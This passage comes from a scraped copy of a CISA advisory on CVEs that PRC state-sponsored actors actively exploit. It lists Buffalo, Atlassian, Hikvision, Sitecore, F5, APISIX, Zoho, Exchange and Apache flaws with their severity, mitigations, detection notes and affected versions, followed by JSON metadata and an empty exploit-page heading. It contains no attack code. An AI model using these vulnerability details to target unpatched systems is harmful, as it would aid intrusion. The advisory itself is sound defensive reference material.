\n_Recommended Mitigations_\n\n * Apply Cisco software updates. \n \n_Detection Methods_\n\n * Look at the Snort [Rules](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR#details>) provided by Cisco. \n \n_Vulnerable Technologies and Versions_\n\nCisco Hyperflex Hx Data Platform 4.0(2A) \n \n_Table XI: Buffalo CVE-2021-20090_\n\nBuffalo CVE-2021-20090 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nA path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote malicious actors to bypass authentication. \n \n_Recommended Mitigations_\n\n * Update firmware to latest available version. \n \n_Detection Methods_\n\n * N/A \n \n_Vulnerable Technologies and Versions_\n\nBuffalo Wsr-2533Dhpl2-Bk Firmware\n\nBuffalo Wsr-2533Dhp3-Bk Firmware \n \n_Table XII: Atlassian CVE-2021-26084_\n\nAtlassian CVE-2021-26084 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23 and from version 6.14.0 before 7.4.11, version 7.5.0 before 7.11.6, and version 7.12.0 before 7.12.5. \n \n_Recommended Mitigations_\n\n * Update confluence version to 6.13.23, 7.4.11, 7.11.6, 7.12.5, and 7.13.0.\n * Avoid using end-of-life devices.\n * Use Intrusion Detection Systems (IDS). \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nAtlassian Confluence\n\nAtlassian Confluence Server\n\nAtlassian Data Center\n\nAtlassian Jira Data Center \n \n_Table XIII: Hikvision CVE-2021-36260_\n\nHikvision CVE-2021-36260 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A command injection vulnerability exists in the web server of some Hikvision products. Due to the insufficient input validation, a malicious actor can exploit the vulnerability to launch a command injection by sending some messages with malicious commands. \n \n_Recommended Mitigations_\n\n * Apply the latest firmware updates. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nVarious Hikvision Firmware to include Ds, Ids, and Ptz \n \n_References_\n\n<https://www.cisa.gov/uscert/ncas/current-activity/2021/09/28/rce-vulnerability-hikvision-cameras-cve-2021-36260> \n \n_Table XIV: Sitecore CVE-2021-42237_\n\nSitecore CVE-2021-42237 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nSitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability. \n \n_Recommended Mitigations_\n\n * Update to latest version.\n * Delete the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx. \n \n_Detection Methods_\n\n * N/A \n \n_Vulnerable Technologies and Versions_\n\nSitecore Experience Platform 7.5, 7.5 Update 1, and 7.5 Update 2\n\nSitecore Experience Platform 8.0, 8.0 Service Pack 1, and 8.0 Update 1-Update 7\n\nSitecore Experience Platform 8.0 Service Pack 1\n\nSitecore Experience Platform 8.1, and Update 1-Update 3\n\nSitecore Experience Platform 8.2, and Update 1-Update 7 \n \n_Table XV: F5 CVE-2022-1388_\n\nF5 CVE-2022-1388 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. \n \n_Recommended Mitigations_\n\n * Block iControl REST access through the self IP address.\n * Block iControl REST access through the management interface.\n * Modify the BIG-IP httpd configuration. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nBig IP versions:\n\n16.1.0-16.1.2\n\n15.1.0-15.1.5\n\n14.1.0-14.1.4\n\n13.1.0-13.1.4\n\n12.1.0-12.1.6\n\n11.6.1-11.6.5 \n \n_Table XVI: Apache CVE-2022-24112_\n\nApache CVE-2022-24112 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nA malicious actor can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. \n \n_Recommended Mitigations_\n\n * In affected versions of Apache APISIX, you can avoid this risk by explicitly commenting out batch-requests in the conf/config.yaml and conf/config-default.yaml files and restarting Apache APISIX.\n * Update to 2.10.4 or 2.12.1. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nApache APISIX between 1.3 and 2.12.1 (excluding 2.12.1)\n\nLTS versions of Apache APISIX between 2.10.0 and 2.10.4 \n \n_Table XVII: ZOHO CVE-2021-40539_\n\nZOHO CVE-2021-40539 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nZoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution. \n \n_Recommended Mitigations_\n\n * Upgrade to latest version. \n \n_Detection Methods_\n\n * Run ManageEngine\u2019s detection tool.\n * Check for specific files and [logs](<https://www.manageengine.com/products/self-service-password/advisory/CVE-2021-40539.html>). \n \n_Vulnerable Technologies and Versions_\n\nZoho Corp ManageEngine ADSelfService Plus \n \n_Table XVIII: Microsoft CVE-2021-26857_\n\nMicrosoft CVE-2021-26857 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: https://github.com/microsoft/CSS-Exchange/tree/main/Security.\n * Hashes can be found here: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_Table XIX: Microsoft CVE-2021-26858_\n\nMicrosoft CVE-2021-26858 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n * Hashes can be found here: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log>. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_Table XX: Microsoft CVE-2021-27065_\n\nMicrosoft CVE-2021-27065 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n * Hashes can be found here: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log>. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_References_\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065> \n \n_Table XXI: Apache CVE-2021-41773_\n\nApache CVE-2021-41773 CVSS 3.0: 7.5 (High) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. A malicious actor could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied,\" these requests can succeed. Enabling CGI scripts for these aliased paths could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 is incomplete (see CVE-2021-42013). \n \n_Recommended Mitigations_\n\n * Apply update or patch. \n \n_Detection Methods_\n\n * Commercially available scanners can detect CVE. \n \n_Vulnerable Technologies and Versions_\n\nApache HTTP Server 2.4.49 and 2.4.50\n\nFedoraproject Fedora 34 and 35\n\nOracle Instantis Enterprise Track 17.1-17.3\n\nNetapp Cloud Backup \n \n### Revisions\n\nInitial Publication: October 6, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-06T12:00:00", "type": "ics", "title": "Top CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134", "CVE-2023-27350"], "modified": "2022-10-06T12:00:00", "id": "AA22-279A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-279a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager

Description

Related